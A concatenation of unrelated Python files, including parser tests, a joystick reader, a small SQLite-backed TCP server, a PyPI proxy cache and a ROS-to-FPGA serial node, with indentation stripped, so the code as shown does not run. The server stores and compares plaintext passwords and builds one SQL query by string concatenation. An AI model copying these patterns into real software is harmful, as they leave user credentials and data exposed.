scalyr_util.parse_data_rate_string("100 tiB/s"),
)
def test_denominators(self):
self.assertEqual(100000, scalyr_util.parse_data_rate_string("100000 B/s"))
self.assertEqual(
100000 / 60.0, scalyr_util.parse_data_rate_string("100000 B/m")
)
self.assertEqual(
100000 / 60.0 / 60.0, scalyr_util.parse_data_rate_string("100000 B/h")
)
self.assertEqual(
100000 / 60.0 / 60.0 / 24.0,
scalyr_util.parse_data_rate_string("100000 B/d"),
)
self.assertEqual(
100000 / 60.0 / 60.0 / 24.0 / 7.0,
scalyr_util.parse_data_rate_string("100000 B/w"),
)
def test_spacing(self):
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1 kiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1\tkiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1 \t \t kiB/s"))
def test_capitalization(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/S"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 b/S")
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 b/s")
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1KiB/S"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kIB/S"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1KB/S"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1kB/S"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1Kb/S")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1kib/S")
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1KiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kIB/s"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1KB/s"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1kB/s"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1Kb/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1kb/s")
def test_values(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertEqual(-100, scalyr_util.parse_data_rate_string("-100 B/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("0 B/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("0 gB/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("-0 gB/s"))
self.assertEqual(-100.2456, scalyr_util.parse_data_rate_string("-100.2456 B/s"))
self.assertEqual(
199.000001, scalyr_util.parse_data_rate_string("199.000001 B/s")
)
self.assertEqual(
1024 * 1024 * 1024 * 1024 / 60.0 / 60.0 / 24.0 / 7.0,
scalyr_util.parse_data_rate_string("1 tiB/w"),
)
def test_invalid_inputs(self):
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "B/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 /")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "- B/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 YB/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 B/C")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 D/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 g1/s")
|
manual_ctrl.py
|
#!/usr/bin/env python3
# set up wheel
import array
import os
import struct
from fcntl import ioctl
from typing import NoReturn
# Iterate over the joystick devices.
print('Available devices:')
for fn in os.listdir('/dev/input'):
if fn.startswith('js'):
print(f' /dev/input/{fn}')
# We'll store the states here.
axis_states = {}
button_states = {}
# These constants were borrowed from linux/input.h
axis_names = {
0x00 : 'x',
0x01 : 'y',
0x02 : 'z',
0x03 : 'rx',
0x04 : 'ry',
0x05 : 'rz',
0x06 : 'trottle',
0x07 : 'rudder',
0x08 : 'wheel',
0x09 : 'gas',
0x0a : 'brake',
0x10 : 'hat0x',
0x11 : 'hat0y',
0x12 : 'hat1x',
0x13 : 'hat1y',
0x14 : 'hat2x',
0x15 : 'hat2y',
0x16 : 'hat3x',
0x17 : 'hat3y',
0x18 : 'pressure',
0x19 : 'distance',
0x1a : 'tilt_x',
0x1b : 'tilt_y',
0x1c : 'tool_width',
0x20 : 'volume',
0x28 : 'misc',
}
button_names = {
0x120 : 'trigger',
0x121 : 'thumb',
0x122 : 'thumb2',
0x123 : 'top',
0x124 : 'top2',
0x125 : 'pinkie',
0x126 : 'base',
0x127 : 'base2',
0x128 : 'base3',
0x129 : 'base4',
0x12a : 'base5',
0x12b : 'base6',
0x12f : 'dead',
0x130 : 'a',
0x131 : 'b',
0x132 : 'c',
0x133 : 'x',
0x134 : 'y',
0x135 : 'z',
0x136 : 'tl',
0x137 : 'tr',
0x138 : 'tl2',
0x139 : 'tr2',
0x13a : 'select',
0x13b : 'start',
0x13c : 'mode',
0x13d : 'thumbl',
0x13e : 'thumbr',
0x220 : 'dpad_up',
0x221 : 'dpad_down',
0x222 : 'dpad_left',
0x223 : 'dpad_right',
# XBox 360 controller uses these codes.
0x2c0 : 'dpad_left',
0x2c1 : 'dpad_right',
0x2c2 : 'dpad_up',
0x2c3 : 'dpad_down',
}
axis_map = []
button_map = []
def wheel_poll_thread(q: 'Queue[str]') -> NoReturn:
# Open the joystick device.
fn = '/dev/input/js0'
print(f'Opening {fn}...')
jsdev = open(fn, 'rb')
# Get the device name.
#buf = bytearray(63)
buf = array.array('B', [0] * 64)
ioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)
js_name = buf.tobytes().rstrip(b'\x00').decode('utf-8')
print(f'Device name: {js_name}')
# Get number of axes and buttons.
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
# Get the axis map.
buf = array.array('B', [0] * 0x40)
ioctl(jsdev, 0x80406a32, buf) # JSIOCGAXMAP
for _axis in buf[:num_axes]:
axis_name = axis_names.get(_axis, f'unknown(0x{_axis:02x})')
axis_map.append(axis_name)
axis_states[axis_name] = 0.0
# Get the button map.
buf = array.array('H', [0] * 200)
ioctl(jsdev, 0x80406a34, buf) # JSIOCGBTNMAP
for btn in buf[:num_buttons]:
btn_name = button_names.get(btn, f'unknown(0x{btn:03x})')
button_map.append(btn_name)
button_states[btn_name] = 0
print('%d axes found: %s' % (num_axes, ', '.join(axis_map)))
print('%d buttons found: %s' % (num_buttons, ', '.join(button_map)))
# Enable FF
import evdev # pylint: disable=import-error
from evdev import ecodes, InputDevice # pylint: disable=import-error
device = evdev.list_devices()[0]
evtdev = InputDevice(device)
val = 24000
evtdev.write(ecodes.EV_FF, ecodes.FF_AUTOCENTER, val)
while True:
evbuf = jsdev.read(8)
value, mtype, number = struct.unpack('4xhBB', evbuf)
# print(mtype, number, value)
if mtype & 0x02: # wheel & paddles
axis = axis_map[number]
if axis == "z": # gas
fvalue = value / 32767.0
axis_states[axis] = fvalue
normalized = (1 - fvalue) * 50
q.put(f"throttle_{normalized:f}")
elif axis == "rz": # brake
fvalue = value / 32767.0
axis_states[axis] = fvalue
normalized = (1 - fvalue) * 50
q.put(f"brake_{normalized:f}")
elif axis == "x": # steer angle
fvalue = value / 32767.0
axis_states[axis] = fvalue
normalized = fvalue
q.put(f"steer_{normalized:f}")
elif mtype & 0x01: # buttons
if value == 1: # press down
if number in [0, 19]: # X
q.put("cruise_down")
elif number in [3, 18]: # triangle
q.put("cruise_up")
elif number in [1, 6]: # square
q.put("cruise_cancel")
elif number in [10, 21]: # R3
q.put("reverse_switch")
if __name__ == '__main__':
from multiprocessing import Process, Queue
q: Queue[str] = Queue()
p = Process(target=wheel_poll_thread, args=(q,))
p.start()
|
server.py
|
import sqlite3
import socket
import sys
import threading
import json
import test
conn_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_addr = ('127.0.0.1', 8888)
is_finished = [False]
ban_list = list()
def thread_tcp():
conn_tcp.bind(server_addr)
conn_tcp.listen()
while not is_finished[0]:
try:
conn, addr = conn_tcp.accept()
if addr in ban_list:
print('Ban connection', addr)
conn.close()
else:
print('Get connection', addr)
t = threading.Thread(target=thread_connection, args=(conn, addr))
t.start()
except:
ban_list.append(addr)
print('Connection lost', addr)
conn.close()
def thread_connection(client_socket, client_addr):
try:
while True:
data = client_socket.recv(2048).decode()
print(sys.getsizeof(data))
if sys.getsizeof(data) > 2048:
print('Catch buffer overflow from', client_addr)
client_socket.close()
return
if not data:
break
print('GET FROM', client_addr, data, sys.getsizeof(data), 'bytes')
data = data_menu(data, client_addr)
print('SEND TO', client_addr, data)
client_socket.sendall(data.encode())
except:
print('Connection lost', client_addr)
ban_list.append(client_addr)
finally:
client_socket.close()
def data_menu(data: str, addr) -> str:
conn_sql = sqlite3.connect('new.db')
cursor = conn_sql.cursor()
try:
data = json.loads(data)
except:
data = ['bad request']
if data[0] == 'in':
res = cursor.execute(' SELECT name, password, role FROM users WHERE name = ? and password = ?', (data[1], data[2],)).fetchone()
if res is not None:
data = [[res[0], res[1], res[2]], get_posts(cursor, conn_sql)]
if res[2] == 2:
data.append(get_users(cursor))
else:
data = ['wrong input']
elif data[0] == 'up':
if cursor.execute(' SELECT COUNT(*) FROM users WHERE name = ? ', (data[1],)).fetchone()[0] == 0:
cursor.execute(' INSERT INTO users(name, password, role) VALUES (?, ?, 1)', (data[1], data[2],))
data = [[data[1], data[2], 1], get_posts(cursor, conn_sql)]
else:
data = ['already exist']
elif data[0] == 'books':
data = get_posts(cursor, conn_sql)
elif data[0] == 'users':
res = cursor.execute(' SELECT role FROM users WHERE name = ? and password = ? ', (data[1], data[2],)).fetchone()
if res is not None and res[0] == 2:
data = get_users(cursor)
else:
data = ['permission denied']
elif data[0] == 'create book':
res = cursor.execute(' SELECT id FROM users WHERE name = ? and password = ? ', (data[1], data[2],)).fetchone()
if res is not None:
cursor.execute(' INSERT INTO posts(id_users, name, category, author, price, telephone) VALUES(?, ?, ?, ?, ?, ?) ', (res[0], data[3], data[4], data[5], data[6], data[7],))
data = ['create book', data[3]]
else:
data = ['no create book']
elif data[0] == 'delete book':
if cursor.execute(' SELECT role FROM users WHERE name = ? and password = ? ', (data[1], data[2],)).fetchone()[0] == 2:
cursor.execute(' DELETE FROM posts WHERE id = ? ', (data[3], ))
data = ['delete book', data[3]]
else:
res = cursor.execute(' SELECT id_users FROM posts WHERE id = ? ', (data[3],)).fetchone()[0]
if cursor.execute(' SELECT COUNT(*) FROM users WHERE name = ? and password = ? and id = ? ', (data[1], data[2], res,)).fetchone()[0] == 1:
cursor.execute(' DELETE FROM posts WHERE id = ? ', (data[3],))
data = ['delete book', data[3]]
else:
data = ['no delete book', data[3]]
elif data[0] == 'update role':
res = cursor.execute(' SELECT id, role FROM users WHERE name = ? and password = ? ', (data[1], data[2],)).fetchone()
if res is not None:
if str(res[0]) != str(data[3]) and res[1] == 2:
role = cursor.execute(' SELECT role FROM users WHERE id = ? ', (data[3],)).fetchone()[0]
role = 1 if role == 2 else 2
cursor.execute(' UPDATE users SET role = ? WHERE id = ? ', (role, data[3],))
data = ['update role']
else:
data = ['no update role', data[3]]
else:
data = ['no update role', data[3]]
cursor.close()
conn_sql.commit()
conn_sql.close()
return json.dumps(data)
def get_posts(cur, conn) -> list:
posts = list()
for row in cur.execute(" SELECT id, name, category, author, price, telephone, id_users FROM posts "):
row = list(row)
cursor_user = conn.cursor()
user_name = cursor_user.execute(" SELECT name FROM users WHERE id = " + str(row[-1]) + "").fetchone()[0]
cursor_user.close()
row[-1] = user_name
posts.append(row)
return posts
def get_users(cur) -> list:
users = list()
for row in cur.execute(" SELECT id, name, role FROM users "):
users.append(list(row))
return users
if __name__ == '__main__':
t_server = threading.Thread(target=thread_tcp)
t_server.start()
t_server.join()
|
_cache.py
|
"""Package index interfacing and caching."""
import io
import os
import re
import time
import shutil
import logging
import tempfile
import threading
import collections
import typing as t
from urllib import parse as urllib_parse
import requests
from lxml import etree as lxml_etree
INDEX_URL = os.environ.get("PROXPI_INDEX_URL", "https://pypi.org/simple/")
EXTRA_INDEX_URLS = os.environ.get("PROXPI_EXTRA_INDEX_URLS", "").strip().split(",")
EXTRA_INDEX_URLS = [s for s in EXTRA_INDEX_URLS if s]
INDEX_TTL = int(os.environ.get("PROXPI_INDEX_TTL", 1800))
EXTRA_INDEX_TTLS = os.environ.get("PROXPI_EXTRA_INDEX_TTL", "").strip().split(",")
EXTRA_INDEX_TTLS = [s for s in EXTRA_INDEX_TTLS if s]
EXTRA_INDEX_TTLS = [int(s) for s in EXTRA_INDEX_TTLS] or [180] * len(EXTRA_INDEX_URLS)
CACHE_SIZE = int(os.environ.get("PROXPI_CACHE_SIZE", 5368709120))
logger = logging.getLogger(__name__)
_name_normalise_re = re.compile("[-_.]+")
_html_parser = lxml_etree.HTMLParser()
File = collections.namedtuple("File", ("name", "url", "fragment", "attributes"))
class NotFound(ValueError):
"""Package or file not found."""
pass
class Thread(threading.Thread):
"""Exception-storing thread runner."""
exc = None
def run(self):
try:
super().run()
except Exception as e:
self.exc = e
raise
def join(self, timeout=None):
super().join(timeout)
if self.exc:
raise self.exc
class _Locks:
def __init__(self):
self._lock = threading.Lock()
self._locks = {}
def __getitem__(self, k: str) -> threading.Lock:
if k not in self._locks:
with self._lock:
if k not in self._locks:
self._locks[k] = threading.Lock()
return self._locks[k]
def _mask_password(url: str) -> str:
"""Mask HTTP basic auth password in URL.
Args:
url: URL to process
Returns:
URL with password masked (or original URL if it has no password)
"""
parsed = urllib_parse.urlsplit(url)
if not parsed.password:
return url
netloc = f"{parsed.username}:****@" + parsed.hostname
if parsed.port is not None:
netloc += f":{parsed.port}"
parsed = parsed._replace(netloc=netloc)
return urllib_parse.urlunsplit(parsed)
class _IndexCache:
"""Cache for an index.
Args:
index_url: index URL
ttl: cache time-to-live
"""
def __init__(self, index_url: str, ttl: int):
self.index_url = index_url
self.ttl = ttl
self._index_t = None
self._packages_t = {}
self._index_lock = threading.Lock()
self._package_locks = _Locks()
self._index = {}
self._packages = {}
self._index_url_masked = _mask_password(index_url)
def __repr__(self):
return f"{self.__class__.__name__}({self._index_url_masked!r}, {self.ttl!r})"
def _list_packages(self):
"""List packages using or updating cache."""
if self._index_t is not None and (time.monotonic() - self._index_t) < self.ttl:
return
logger.info(f"Listing packages in index '{self._index_url_masked}'")
response = requests.get(self.index_url)
tree = lxml_etree.parse(io.BytesIO(response.content), _html_parser)
self._index_t = time.monotonic()
root = tree.getroot()
body = next(b for b in root if b.tag == "body")
for child in body:
if child.tag == "a":
name = _name_normalise_re.sub("-", child.text).lower()
self._index[name] = child.attrib["href"]
def list_packages(self) -> t.Iterable[str]:
"""List packages.
Returns:
names of packages in index
"""
with self._index_lock:
self._list_packages()
return tuple(self._index)
def _list_files(self, package_name: str):
"""List package files using or updating cache."""
packages_t = self._packages_t.get(package_name)
if packages_t is not None and (time.monotonic() - packages_t) < self.ttl:
return
with self._index_lock:
self._list_packages()
if package_name not in self._index:
raise NotFound(package_name)
logger.debug(f"Listing files in package '{package_name}'")
package_url = self._index[package_name]
url = urllib_parse.urljoin(self.index_url, package_url)
response = requests.get(url)
self._packages_t[package_name] = time.monotonic()
tree = lxml_etree.parse(io.BytesIO(response.content), _html_parser)
root = tree.getroot()
body = next(b for b in root if b.tag == "body")
self._packages.setdefault(package_name, {})
for child in body:
if child.tag == "a":
name = child.text
url = child.attrib["href"]
attributes = {k: v for k, v in child.attrib.items() if k != "href"}
fragment = urllib_parse.urlsplit(url).fragment
self._packages[package_name][name] = File(
name, url, fragment, attributes
)
def list_files(self, package_name: str) -> t.Iterable[File]:
"""List package files.
Args:
package_name: name of package to list files of
Returns:
files of package
Raises:
NotFound: if package doesn't exist in index
"""
with self._package_locks[package_name]:
self._list_files(package_name)
return tuple(self._packages[package_name].values())
def get_file_url(self, package_name: str, file_name: str) -> str:
"""Get a file.
Args:
package_name: package of file to get
file_name: name of file to get
Returns:
local file path, or original file URL if not yet available
Raises:
NotFound: if package doesn't exist in index or file doesn't
exist in package
"""
with self._package_locks[package_name]:
self._list_files(package_name)
if file_name not in self._packages[package_name]:
raise NotFound(file_name)
return self._packages[package_name][file_name].url
def invalidate_list(self):
"""Invalidate package list cache."""
if self._index_lock.locked():
logger.info("Index already undergoing update")
return
self._index_t = None
self._index = {}
def invalidate_package(self, package_name: str):
"""Invalidate package file list cache.
Args:
package_name: package name
"""
if self._package_locks[package_name].locked():
logger.info(f"Package '{package_name}' files already undergoing update")
return
self._packages_t.pop(package_name, None)
self._packages.pop(package_name, None)
class _CachedFile:
__slots__ = ("path", "size", "n_hits")
def __init__(self, path, size, n_hits):
self.path = path
self.size = size
self.n_hits = n_hits
class _FileCache:
def __init__(self, max_size):
self.max_size = max_size
self._package_dir = tempfile.mkdtemp()
self._files = {}
def __repr__(self):
return f"{self.__class__.__name__}({self.max_size!r})"
def __del__(self):
if os.path.isdir(self._package_dir):
logger.debug(f"Deleting '{self._package_dir}'")
shutil.rmtree(self._package_dir)
def _download_file(self, url: str, path: str):
"""Download a file.
Args:
url: URL of file to download
path: local path to download to
"""
url_masked = _mask_password(url)
logger.debug(f"Downloading '{url_masked}' to '{path}'")
response = requests.get(url, stream=True)
if response.status_code // 100 >= 4:
logger.error(
f"Failed to download '{url_masked}': "
f"status={response.status_code}, body={response.text}"
)
return
parent, _ = os.path.split(path)
os.makedirs(parent, exist_ok=True)
with open(path, "wb") as f:
for chunk in response.iter_content(None):
f.write(chunk)
self._files[url] = _CachedFile(path, os.stat(path).st_size, 0)
def _wait_for_existing_download(self, url: str) -> t.Union[str, None]:
"""Wait 0.9s for existing download."""
file = self._files.get(url)
if isinstance(file, Thread):
try:
file.join(0.9)
except Exception as e:
if file.exc and file == self._files[url]:
self._files.pop(url, None)
url_masked = _mask_password(url)
logger.error(f"Failed to download '{url_masked}'", exc_info=e)
return url
if isinstance(self._files[url], Thread):
return url # default to original URL
return None
def _get_cached(self, url: str) -> t.Union[str, None]:
"""Get file from cache."""
if url in self._files:
file = self._files[url]
file.n_hits += 1
return file.path
return None
def _start_downloading(self, url: str):
"""Start downloading a file."""
path = urllib_parse.urlsplit(url).path
path = os.path.join(self._package_dir, path.lstrip("/"))
thread = Thread(target=self._download_file, args=(url, path))
self._files[url] = thread
thread.start()
def _evict_lfu(self, url: str):
"""Evict least-frequently-used files until under max cache size."""
response = requests.head(url)
file_size = int(response.headers.get("Content-Length", 0))
existing_urls = sorted(
(f for f in self._files if isinstance(f, _CachedFile)),
key=lambda k: self._files[k].n_hist,
)
existing_size = sum(self._files[k].size for k in existing_urls)
while existing_size + file_size > self.max_size and existing_size > 0:
existing_url = existing_urls.pop(0)
file = self._files.pop(existing_url)
os.unlink(file.path)
existing_size -= file.size
def get(self, url: str) -> str:
"""Get a file using or updating cache.
Args:
url: original file URL
Returns:
local file path, or original file URL if not yet available
"""
if self.max_size == 0:
return url
path = self._wait_for_existing_download(url)
if not path:
path = self._get_cached(url)
if not path:
self._start_downloading(url)
self._evict_lfu(url)
path = self.get(url)
return path
class Cache:
"""Package index cache.
Args:
root_cache: root index cache
file_cache: downloaded package file cache
extra_caches: extra indices' caches
"""
_index_cache_cls = _IndexCache
_file_cache_cls = _FileCache
def __init__(
self,
root_cache: _IndexCache,
file_cache: _FileCache,
extra_caches: t.List[_IndexCache] = None,
):
self.root_cache = root_cache
self.file_cache = file_cache
self.extra_caches = extra_caches or []
self._packages = {}
self._list_dt = None
self._package_list_dt = {}
def __repr__(self):
return (
f"{self.__class__.__name__}({self.root_cache!r}, {self.file_cache!r}, "
f"{self.extra_caches!r})"
)
@classmethod
def from_config(cls):
"""Create cache from configuration."""
root_cache = cls._index_cache_cls(INDEX_URL, INDEX_TTL)
file_cache = cls._file_cache_cls(CACHE_SIZE)
assert len(EXTRA_INDEX_URLS) == len(EXTRA_INDEX_TTLS)
extra_caches = [
cls._index_cache_cls(url, ttl)
for url, ttl in zip(EXTRA_INDEX_URLS, EXTRA_INDEX_TTLS)
]
return cls(root_cache, file_cache, extra_caches=extra_caches)
def list_packages(self) -> t.Iterable[str]:
"""List all packages.
Returns:
names of all discovered packages
"""
packages = set(self.root_cache.list_packages())
for cache in self.extra_caches:
packages.update(cache.list_packages())
return sorted(packages)
def list_files(self, package_name: str) -> t.Iterable[File]:
"""List package files.
Args:
package_name: name of package to list files of
Returns:
files of package
Raises:
NotFound: if package doesn't exist in any index
"""
files = []
try:
root_files = self.root_cache.list_files(package_name)
except NotFound as e:
exc = e
else:
files.extend(root_files)
for cache in self.extra_caches:
try:
extra_files = cache.list_files(package_name)
except NotFound:
continue
for file in extra_files:
if file.name not in {f.name for f in files}:
files.append(file)
if not files:
raise exc
return files
def get_file(self, package_name: str, file_name: str) -> str:
"""Get a file.
Args:
package_name: package of file to get
file_name: name of file to get
Returns:
local file path, or original file URL if not yet available
Raises:
NotFound: if package doesn't exist in any index or file doesn't
exist in package
"""
try:
url = self.root_cache.get_file_url(package_name, file_name)
except NotFound as e:
url = e
if isinstance(url, Exception):
for cache in self.extra_caches:
try:
url = cache.get_file_url(package_name, file_name)
except NotFound:
pass
if isinstance(url, Exception):
raise url
return self.file_cache.get(url)
def invalidate_list(self):
"""Invalidate package list cache."""
logger.info("Invalidating package list cache.")
self.root_cache.invalidate_list()
for cache in self.extra_caches:
cache.invalidate_list()
def invalidate_package(self, package_name: str):
"""Invalidate package file list cache.
Args:
package_name: package name
"""
logger.info(f"Invalidating package '{package_name}' file list cache.")
self.root_cache.invalidate_package(package_name)
for cache in self.extra_caches:
cache.invalidate_package(package_name)
|
node_fpga.py
|
#!/usr/bin/env python
import rospy
from master_msgs.msg import traction_Orders, connection, arm_Orders, rpm, current,pots,sensibility,PID
from master_msgs.srv import service_enable
import serial
import threading
import time
import numpy as np
#Variables globales
global latitude, longitude, azimuth, lineal_speed, steering_speed
global L0_speed, L1_speed, L2_speed, R0_speed, R1_speed, R2_speed
global L0_current, L1_current, L2_current, R0_current, R1_current, R2_current
global rover_temp, bat0, bat1, bat2, bat3
global joint0, joint1, joint2, joint3, joint4, joint5, joint6
ultimo_izquierdo=999
ultimo_derecho=999
EnviarMensaje=True #varibale de incilizacion
almacenar=True
almacenar2=True
start_motor=0
SEPARADOR_POSITIVO = "#"
SEPARADOR_NEGATIVO = "!"
inicio_rec = False #Booleano para iniciar thread de fpga recibir valores
##msgs de diferentes tipos para los topicos y publicar###
rpm_present = rpm()
current_present = current()
pots_present = pots()
traction_present=traction_Orders()
arm_present=arm_Orders()
PID_present = PID()
serOpen = 0
# Conexion serial a la FPGA
try:
print(' ')
namePort = '/dev/ttyTHS2'
print("Trying to open serial port:",namePort)
ser = serial.Serial(port=namePort, baudrate = 115200)
serOpen = 1
print("Serial port correct. serOpen",str(serOpen))
print(' ')
except:
print("ERROR: Error opening serial port. serOpen=",str(serOpen))
finally:
print(' ')
# Pin de MUX en la FPGA
### NODO PRINCIPAL ###
def node_fpga():
global pub_RPM,pub_Current,pub_Pots,inicio_rec,start_motor
#creacion del nodo
rospy.init_node('node_fpga',anonymous=True)
#se subscribe al topico traction orders
rospy.Subscriber ('topic_traction_orders', traction_Orders, traction_Orders_Callback)
#se subscribe al topico connection
# rospy.Subscriber ('topic_connection', connection, connection_Callback)
# se subscribe al topico Arm Orders
rospy.Subscriber ('topic_arm_orders', arm_Orders, arm_Orders_Callback)
# publica en RPM, Current y POTS
pub_RPM = rospy.Publisher('topic_rpm', rpm, queue_size=10)
pub_Current = rospy.Publisher('topic_current', current, queue_size=10)
pub_Pots= rospy.Publisher('topic_pots',pots,queue_size=10)
pub_PID = rospy.Publisher('topic_PID', PID, queue_size=10)
threading.Thread(target=enviarMensajeInicializacion).start()
threading.Thread(target=StartServerFPGA).start()
enable = rospy.Service('service_enable', service_enable, handle_enable)
rate = rospy.Rate (10)
while not rospy.is_shutdown ():
rate.sleep ()
def enviarMensajeInicializacion():
print('inicializando...')
global EnviarMensaje
contador=0
while EnviarMensaje:
nMsg = 1 # 3
if serOpen:
WriteFPGA("A" + str(nMsg) + "#I0#I1#I2#I3#I4#I5#")
time.sleep(1)
contador=contador+1
if contador>4:
EnviarMensaje=False
###NODOS PARA TOPICOS ###
def traction_Orders_Callback(param):
print('Enviando instrucciones de traccion...')
global traction_present
traction_present=param
procesarJoystick(traction_present.rpm_l, traction_present.rpm_r)
pass
#def connection_Callback(param):
# pass
def arm_Orders_Callback(param):
global arm_present
global serOpen
arm_present=param.message
if serOpen:
almacenar=WriteFPGA(arm_present)
pass
def handle_enable(param):
print('servicio enable')
mensage=param.message
if serOpen:
almacenar2=WriteFPGA(mensage)
return []
###METODOS EXTERNOS A ROS####
def procesarJoystick(RPM_I, RPM_D):
global EnviarMensaje, ultimo_izquierdo, ultimo_derecho
print('Procesar Joystick')
(calc_RPM_izq, calc_RPM_der) = (int(RPM_I), int(RPM_D))
StringIzquierda = ("L" + str(calc_RPM_izq) + SEPARADOR_NEGATIVO) if (calc_RPM_izq >= 0) else (
"L" + str(-calc_RPM_izq) + SEPARADOR_POSITIVO)
StringDerecha = ("R" + str(calc_RPM_der) + SEPARADOR_NEGATIVO) if (calc_RPM_der >= 0) else (
"R" + str(-calc_RPM_der) + SEPARADOR_POSITIVO)
MensajeSeguridadMotores = ""
if np.sign(ultimo_izquierdo) != np.sign(calc_RPM_izq) and calc_RPM_izq != 0 and np.sign(ultimo_izquierdo) != 0:
MensajeSeguridadMotores += "L0#"
if np.sign(ultimo_derecho) != np.sign(calc_RPM_der) and calc_RPM_der != 0 and np.sign(ultimo_derecho) != 0:
MensajeSeguridadMotores += "R0#"
if np.abs(ultimo_izquierdo - calc_RPM_izq) > 0.1 or np.abs(ultimo_derecho - calc_RPM_der) > 0.1 or (
calc_RPM_der == 0 and ultimo_derecho != 0) or (calc_RPM_izq == 0 and ultimo_izquierdo != 0):
if serOpen:
EnviarMensaje=not WriteFPGA(MensajeSeguridadMotores + StringIzquierda + StringDerecha)
ultimo_izquierdo = calc_RPM_izq
ultimo_derecho = calc_RPM_der
# Recepcion de datos de la base a la Rpi y reenvio a la FPGA, manejo del MUX
def WriteFPGA(rcv):
print('write:',rcv)
#ser.write(rcv.encode())
return True
##METODOS PARA RECIBIR INFORMACION POR SERIAL ###
#Recibir datos de la FPGA por serial
def StartServerFPGA():
global L0_speed, L1_speed, L2_speed, R0_speed, R1_speed, R2_speed
global L0_current, L1_current, L2_current, R0_current, R1_current, R2_current
global joint0, joint1, joint2, joint3, joint4, joint5, joint6
global pub_RPM, pub_Current, pub_Pots,rpm_present,current_present,pots_present,PID_controller
print('Server FPGA start.')
line = ""
while(not rospy.is_shutdown()):
try:
received = ser.read()
line += received.decode()
if received=='\x00'.encode():
line = line[:-1]
line = line.strip(''.encode())
if received.decode() == "!" or received.decode() == "#":
signo = 1 if received.decode()=="!" else -1
numero = np.float32(signo * int(line[1:5]))
codigo = line[0]
#print(line)
## Se define que tipo de mensaje esta llegando y a lo que corresponde
if codigo == 'A':
#L0_current = numero
current_present.L1_C=numero/140
elif codigo == 'B':
#L1_current = numero
current_present.L0_C = numero/140
elif codigo == 'C':
#L2_current = numero
current_present.L2_C = numero/140
elif codigo == 'D':
#R0_current = numero
current_present.R0_C = numero/140
elif codigo == 'E':
#R1_current = numero
current_present.R1_C = numero/140
elif codigo == 'F':
#R2_current = numero
current_present.R2_C = numero/140
elif codigo == 'G':
#joint0 = numero
pots_present.J0 = numero
elif codigo == 'H':
#joint1 = numero
pots_present.J1 = numero
elif codigo == 'I':
#joint2 = numero
pots_present.J2 = numero
elif codigo == 'J':
#joint3 = numero
pots_present.J3 = numero
elif codigo == 'K':
#joint4 = numero
pots_present.J4 = numero
elif codigo == 'L':
#joint5 = numero
pots_present.J5 = numero
elif codigo == 'M':
#joint6 = numero
pots_present.J6 = numero
elif codigo == 'N':
#L0_speed = numero
rpm_present.L1_V = -numero
elif codigo == 'O':
#L1_speed = numero
rpm_present.L2_V = -numero
elif codigo == 'P':
#L2_speed = numero
rpm_present.L0_V = -numero
elif codigo == 'Q':
#R0_speed = numero
rpm_present.R2_V = numero
elif codigo == 'R':
#R1_speed = numero
rpm_present.R1_V = numero
elif codigo == 'S':
#R2_speed = numero
rpm_present.R0_V = numero
pub_Current.publish(current_present)
pub_Pots.publish(pots_present)
pub_RPM.publish(rpm_present)
elif codigo == "X":
pub_PID.publish(PID_present)
line = ""
except:
line=""
if __name__ == '__main__':
try:
node_fpga()
except rospy.ROSInterruptException:
pass
|
test_indexes.py
|
# encoding: utf-8
import datetime
import queue
import time
from threading import Thread
from django.test import TestCase
from test_haystack.core.models import (
AFifthMockModel,
AnotherMockModel,
AThirdMockModel,
ManyToManyLeftSideModel,
ManyToManyRightSideModel,
MockModel,
)
from haystack import connections, indexes
from haystack.exceptions import SearchFieldError
from haystack.utils.loading import UnifiedIndex
class BadSearchIndex1(indexes.SearchIndex, indexes.Indexable):
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
def get_model(self):
return MockModel
class BadSearchIndex2(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
content2 = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
def get_model(self):
return MockModel
class GoodMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
